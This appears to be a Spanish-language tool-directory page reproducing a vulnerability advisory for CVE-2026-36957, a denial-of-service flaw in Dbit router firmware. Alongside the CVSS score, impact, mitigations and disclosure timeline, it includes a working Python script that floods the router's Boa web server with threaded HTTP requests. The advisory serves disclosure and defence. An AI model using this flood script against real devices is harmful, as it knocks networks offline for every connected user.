Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-36957 — Prueba de concepto para CVE-2026-36957, una vulnerabilidad de denegación de servicio en el firmware del router Dbit mediante una inundación HTTP sobre el servidor web Boa, que provoca el agotamiento de recursos y el bloqueo del sistema. | Kitploit
Herramientas/GitHubGitHub/kirubel-cve/cve-2026-36957
Análisis de VulnerabilidadesExplotaciónSeguridad WebPruebas de Penetración
GitHubkirubel-cve/cve-2026-36957

CVE-2026-36957

Prueba de concepto para CVE-2026-36957, una vulnerabilidad de denegación de servicio en el firmware del router Dbit mediante una inundación HTTP sobre el servidor web Boa, que provoca el agotamiento de recursos y el bloqueo del sistema.

Ver Repositorio
hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-36957: Denegación de Servicio mediante Inundación HTTP en el Servidor Web Boa

ID CVE: CVE-2026-36957 Fecha: 2026-04-29 Descubridor: Kirubel Solomne Proveedor: Shenzhen Dibit Network Equipment Co., Ltd. Producto: Router Dbit Versión de Firmware: V1.0.0 CWE: CWE-400 - Consumo de Recursos No Controlado


Descripción

El firmware V1.0.0 del Router Dbit es vulnerable a Denegación de Servicio a través del manejador de URI del servidor web Boa. Al enviar una inundación de alto volumen de solicitudes HTTP GET a URIs inexistentes, un atacante puede agotar recursos críticos del sistema, incluidos descriptores de archivo y buffers de memoria. Esto provoca un bloqueo del kernel o una congelación del sistema que desactiva el portal de gestión web y todas las capacidades de enrutamiento.


Puntuación CVSS

Puntuación CVSS v3.1: 7.5 (Alta) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

MétricaValor
Vector de AtaqueRed
Complejidad de AtaqueBaja
Privilegios RequeridosNinguno
Interacción del UsuarioNinguna
Impacto de ConfidencialidadNinguno
Impacto de IntegridadNinguno
Impacto de DisponibilidadAlto

Prueba de Concepto

root@kitploit:~
import requests
import threading

TARGET = "http://192.168.10.1"

def flood(i):
    try:
        requests.get(f"{TARGET}/nonexistent_{i}", timeout=2)
    except:
        pass

threads = []
for i in range(1000):
    t = threading.Thread(target=flood, args=(i,))
    threads.append(t)
    t.start()

for t in threads:
    t.join()

print("Done. Check if router is still responsive.")

Comportamiento Esperado: El servidor debería limitar las conexiones y permanecer estable. Comportamiento Real: La interfaz web del router deja de responder; se requiere un reinicio manual.


Impacto

  • Pérdida total de la interfaz de gestión web
  • Interrupción de todas las capacidades de enrutamiento
  • Requiere reinicio manual para restaurar el servicio
  • Tiempo de inactividad de red para todos los dispositivos conectados

Mitigación

  • Implementar limitación de velocidad de conexiones en el servidor web Boa
  • Añadir un temporizador de vigilancia para recuperarse de estados de bloqueo
  • Limitar el número máximo de conexiones concurrentes por IP

Cronología de Divulgación

FechaEvento
2026-04-29Vulnerabilidad descubierta
2026-04-29Reportada a MITRE
2026-04-29CVE-2026-36957 asignado
2026-04-29Divulgación pública

Referencias

  • MITRE CVE-2026-36957
  • CWE-400
  • Sitio Web del Proveedor
Descargar herramienta